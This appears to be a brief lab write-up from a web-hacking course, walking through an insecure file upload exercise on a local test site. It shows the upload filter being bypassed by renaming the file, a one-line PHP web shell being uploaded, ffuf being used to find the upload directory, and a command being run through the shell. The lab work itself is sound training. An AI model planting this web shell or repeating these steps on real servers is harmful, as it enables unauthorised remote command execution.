Insecure file upload 0x01

The page only accept jpg and png

when we deleted the png data and change it to hello there

we also change the tcm-logo.png to tcm-logo.txt

We successfully get the result txt

Then we change the file name and extension

from tcm-logo.txt to cmd.php

with this line of code that we can get the cmd side

<?php system($_GET['cmd']); ?>

As we can see the cmd file is uploaded

Now search where the file was uploaded

ffuf -u http://localhost/FUZZ -w /usr/share/wordlists/dirb/common.txt

ffuf -u http://localhost/labs/FUZZ -w /usr/share/wordlists/dirb/common.txt

then just access the php file

http://localhost/labs/uploads/cmd2.php?cmd=whoami

Last updated 1 year ago